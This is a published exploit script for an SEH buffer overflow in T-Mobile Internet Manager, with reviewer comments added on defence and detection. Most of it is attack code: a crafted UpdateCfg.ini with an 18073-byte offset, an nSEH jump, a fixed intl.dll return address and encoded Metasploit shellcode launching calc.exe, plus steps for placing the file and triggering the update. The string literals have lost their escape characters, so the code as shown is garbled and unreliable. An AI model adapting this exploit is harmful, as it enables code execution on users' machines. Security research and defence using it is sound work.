
T-Mobile Internet Manager SEH Buffer Overflow

Posted on 14 January 2015

#!/usr/bin/python
# coding: utf-8
#Exploit Title:T-Mobile Internet Manager SEH Buffer Overflow
#Version:Internet Manager Software für Windows (TMO_PCV1.0.5B06)
#Software for usb Wireless:T-Mobile web'n'walk Stick Fusion
#Homepage:https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html
#Software Link:https://www.t-mobile.de/downloads/neu/winui.zip
#Found:8.01.2015
#Exploit Author: metacom - twitter.com/m3tac0m
#Tested on: Win-7 En, Win-8.1 DE-Enterprise, Win-XPSp3 EN
#Video poc:http://bit.ly/17DhwSR
#
# Purpose: Python 2 script (print statements) that writes a crafted
# "UpdateCfg.ini" into the current working directory. Per the author's
# instructions below, the file only takes effect once it has been copied into
# the product's Bin directory and the user runs the update check from the
# Options menu, so this is a local, file-based, user-triggered issue.
#
# NOTE(review): as printed on this page the string literals appear to have lost
# their escape characters in extraction; they are kept exactly as shown, so
# the lengths and offsets here are not necessarily those of the author's
# original script.
#
# Defender view:
#  - Precondition is write access to the install directory. On a default
#    Windows install that usually needs administrative rights; verify the
#    ACLs on the product's Bin directory rather than assuming it.
#  - Detection idea: an UpdateCfg.ini whose value line is far longer than a
#    URL or contains non-printable bytes, and an unexpected child process of
#    the manager executable after an update check.
#  - The root cause is presumably an unbounded copy of an ini value into a
#    stack buffer in the updater; the page does not show the vulnerable code.

# Operator instructions printed by the author: where the generated file has to
# be placed and which UI action makes the program parse it.
print "[*]Copy UpdateCfg.ini to C:Program FilesT-MobileInternetManager_ZBin "
print "[*]Open Program and go to Menu-Options "
print "[*]Click Update and press Now look for Update "

from struct import pack

# Filler placed in front of the exception-handler record; the repeat count
# 18073 is the author's offset for the tested build (TMO_PCV1.0.5B06).
junk="x41" * 18073
# Value written over the "next SEH" field of the handler record.
nseh="xebx06x90x90"
# Value written over the handler pointer, packed little-endian. The author
# annotates the address as a POP EDI sequence inside intl.dll.
# NOTE(review): a fixed address like this only works if that module loads at
# a predictable base and is not covered by SafeSEH; presumably intl.dll ships
# with the product without ASLR/SafeSEH - confirm. SEHOP, where enabled, is
# the generic mitigation for this overwrite pattern.
seh=pack('<I',0x6900CEAE)#6900CEAE 5F POP EDI intl.dll
# Padding between the overwritten handler record and the payload.
nops="x90" * 100
# Author's note on how the payload was produced: a Metasploit windows/exec
# payload that starts calc.exe (a harmless proof of execution), encoded with
# x86/alpha_upper and a bad-character list.
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R |
#msfencode -e x86/alpha_upper -b "x00x0ax0dx1axff" -t c
shellcode=("x89xe2xddxc1xd9x72xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx5ax48x4dx59x55x50"
"x35x50x35x50x53x50x4dx59x4bx55x46x51x59x42x33"
"x54x4cx4bx56x32x30x30x4cx4bx31x42x44x4cx4cx4b"
"x30x52x45x44x4cx4bx44x32x57x58x34x4fx38x37x50"
"x4ax51x36x46x51x4bx4fx30x31x49x50x4ex4cx47x4c"
"x33x51x43x4cx34x42x36x4cx31x30x49x51x48x4fx54"
"x4dx45x51x59x57x4dx32x4cx30x56x32x46x37x4cx4b"
"x31x42x44x50x4cx4bx31x52x57x4cx43x31x48x50x4c"
"x4bx51x50x53x48x4bx35x49x50x34x34x51x5ax53x31"
"x4ex30x36x30x4cx4bx50x48x52x38x4cx4bx36x38x47"
"x50x45x51x58x53x4bx53x57x4cx37x39x4cx4bx36x54"
"x4cx4bx33x31x39x46x30x31x4bx4fx56x51x49x50x4e"
"x4cx4fx31x58x4fx44x4dx55x51x49x57x37x48x4dx30"
"x52x55x4bx44x43x33x43x4dx4ax58x37x4bx33x4dx57"
"x54x33x45x4bx52x30x58x4cx4bx36x38x57x54x33x31"
"x58x53x55x36x4cx4bx54x4cx30x4bx4cx4bx56x38x45"
"x4cx35x51x58x53x4cx4bx55x54x4cx4bx33x31x38x50"
"x4bx39x57x34x31x34x46x44x51x4bx31x4bx53x51x30"
"x59x50x5ax46x31x4bx4fx4dx30x51x48x31x4fx30x5a"
"x4cx4bx34x52x5ax4bx4cx46x31x4dx33x5ax43x31x4c"
"x4dx4cx45x38x39x55x50x45x50x43x30x50x50x53x58"
"x56x51x4cx4bx32x4fx4cx47x4bx4fx38x55x4fx4bx4b"
"x4ex44x4ex30x32x4ax4ax32x48x39x36x4cx55x4fx4d"
"x4dx4dx4bx4fx4ex35x47x4cx33x36x43x4cx35x5ax4d"
"x50x4bx4bx4bx50x54x35x33x35x4fx4bx47x37x52x33"
"x54x32x32x4fx42x4ax43x30x46x33x4bx4fx49x45x52"
"x43x53x51x42x4cx53x53x46x4ex43x55x43x48x35x35"
"x43x30x41x41")

# First part of the ini file. Reading each xNN pair as a hex byte, this spells
# an [UPDATE] section (ENABLE_UPDATE, UPDATE_FREQUENCE) followed by a
# [Service] section (ServiceURL, UpdateReport). The oversized data is appended
# directly to the UpdateReport value on the last line, which suggests that
# this value is the one copied without a length check.
header = "x5bx55x50x44x41x54x45x5dx0ax0ax0ax0ax45x4ex41x42x4cx45x5fx55x50x44x41x54x45x3dx31x0ax0ax0a"
header += "x0ax55x50x44x41x54x45x5fx46x52x45x51x55x45x4ex43x45x3dx31x34x0ax0ax0ax0ax5bx53x65x72x76x69"
header += "x63x65x5dx0ax0ax0ax0ax6dx65x74x61x63x6fx6dx3dx74x77x69x74x74x65x72x2ex63x6fx6dx2fx6dx33x74"
header += "x61x63x30x6dx0ax0ax0ax0ax53x65x72x76x69x63x65x55x52x4cx3dx68x74x74x70x73x3ax2fx2fx74x6dx6f"
header += "x62x69x6cx65x2ex7ax74x65x2ex63x6fx6dx2ex63x6ex2fx55x70x64x61x74x65x45x6ex74x72x79x2ex61x73"
header += "x70x78x0ax0ax0ax0ax55x70x64x61x74x65x52x65x70x6fx72x74x3dx68x74x74x70x73x3ax2fx2fx74x6dx6f"
header += "x62x69x6cx65x2ex7ax74x65x2ex63x6fx6dx2ex63x6ex2fx55x70x64x61x74x65x52x65x73x75x6cx74x52x65"
header += "x70x6fx72x74x2ex61x73x70x78"+junk+nseh+seh+nops+shellcode+' '
# Remainder of the ini file: ordinary-looking settings (ServicePort,
# UPDATE_PATH, RETRY_CONNECT, RETRY_SLEEP, CONNECT_TIMEOUT) and an
# [UpdateMode] section, so the file keeps the layout the program expects.
footer = "x0ax53x65x72x76x69x63x65x50x6fx72x74x3dx34x34x33x0ax0ax0ax0ax55x50x44x41x54x45x5fx50x41x54x48"
footer += "x3dx2ex2fx64x6fx77x6ex6cx6fx61x64x0ax0ax0ax0ax52x45x54x52x59x5fx43x4fx4ex4ex45x43x54x3dx33"
footer += "x30x30x0ax0ax0ax0ax52x45x54x52x59x5fx53x4cx45x45x50x3dx31x0ax0ax0ax0ax43x4fx4ex4ex45x43x54"
footer += "x5fx54x49x4dx45x4fx55x54x3dx32x30x0ax0ax0ax0ax5bx55x70x64x61x74x65x4dx6fx64x65x5dx0ax0ax0a"
footer += "x0ax4dx6fx64x65x53x65x6cx65x63x74x53x79x73x3dx31x0a"

# Complete file content; "exploit" is just header followed by footer.
exploit = header + footer
# Output goes to the current working directory, not to the install directory.
filename = "UpdateCfg.ini"
file = open(filename , "w")
file.write(exploit)
file.close()

 
